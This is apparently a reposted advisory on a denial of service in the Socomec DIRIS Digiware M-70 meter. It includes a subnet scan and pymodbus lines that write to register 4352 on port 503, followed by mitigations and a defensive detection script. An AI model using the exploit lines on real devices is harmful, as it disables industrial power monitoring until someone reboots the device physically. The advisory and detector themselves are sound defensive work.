This vulnerability exploits the Modbus TCP and Modbus RTU over TCP services in the Socomec DIRIS Digiware M-70 energy meter. The attack is an unauthenticated denial of service triggered by sending a specific malformed Modbus packet. The device listens on its standard Modbus TCP port, 503/TCP. An attacker sends a single Modbus “Write Single Register” request (function code 6) targeting holding register address 4352. The payload writes the value ‘1’ to this register. This specific write operation corrupts the device’s internal Modbus address configuration, changing it to address 15. This corruption causes a critical fault in the device’s network service stack, rendering the Modbus service completely unresponsive. The device enters a persistent denial-of-service state, requiring a physical reboot to restore functionality, as all subsequent network communication attempts fail.
Platform: Socomec DIRIS Digiware
Version: M-70 1.6.9
Vulnerability: Denial of Service
Severity: Critical
Date: 12/01/2025
Prediction: Unpatched as of 12/05/2025
What Undercode Say:
nmap -p 503 --open 192.168.1.0/24
from pymodbus.client import ModbusTcpClient
client = ModbusTcpClient('192.168.1.10', port=503)
client.write_register(4352, 1, unit=0x01)
curl http://192.168.1.10 -m 2
How Exploit:
1. Discover target device on port 503/TCP.
2. Send crafted Modbus packet (Function 6, Register 4352, Value 1).
3. Device Modbus service crashes permanently.
Protection from this CVE:
1. Network segmentation.
2. Block port 503 at the firewall.
3. Physical access control.
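A defender-side check for the request described above, as an added example that is not from the advisory or the vendor: it parses a captured payload in either Modbus TCP or Modbus RTU over TCP framing and flags any function-6 write to register 4352. The function names, the constructed sample payloads, and the assumption of one request per payload are this example's own.

```python
import struct

WATCHED_REGISTER = 4352        # holding register named in the text above
WRITE_SINGLE_REGISTER = 0x06   # Modbus function code 6

def crc16_modbus(data: bytes) -> int:
    """CRC-16/MODBUS, appended low byte first to RTU frames."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return crc

def parse_write_single(payload: bytes):
    """Return (framing, unit, register, value) for a function-6 request, else None."""
    # Modbus TCP: MBAP header (transaction id, protocol id 0, length, unit id) + PDU
    if len(payload) >= 12:
        _tid, proto, length, unit = struct.unpack(">HHHB", payload[:7])
        if proto == 0 and length == 6 and payload[7] == WRITE_SINGLE_REGISTER:
            register, value = struct.unpack(">HH", payload[8:12])
            return ("tcp", unit, register, value)
    # Modbus RTU over TCP: unit, function, register, value, CRC (no MBAP header)
    if len(payload) == 8 and payload[1] == WRITE_SINGLE_REGISTER:
        if crc16_modbus(payload[:6]) == int.from_bytes(payload[6:], "little"):
            register, value = struct.unpack(">HH", payload[2:6])
            return ("rtu", payload[0], register, value)
    return None

def is_suspicious(payload: bytes) -> bool:
    """True when the payload is a function-6 write to the watched register."""
    parsed = parse_write_single(payload)
    return parsed is not None and parsed[2] == WATCHED_REGISTER

# Constructed sample payloads (not captured traffic).
SAMPLES = {
    "read holding registers": bytes.fromhex("000100000006010300000002"),
    "write to register 100": bytes.fromhex("000200000006010600640001"),
    "write to register 4352": bytes.fromhex("000300000006010611000001"),
}

if __name__ == "__main__":
    for label, payload in SAMPLES.items():
        print(f"{label}: {'ALERT' if is_suspicious(payload) else 'ok'}")
```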
Impact:
Device unresponsiveness requiring hard reboot.
Sources:
Reported By: nvd.nist.gov

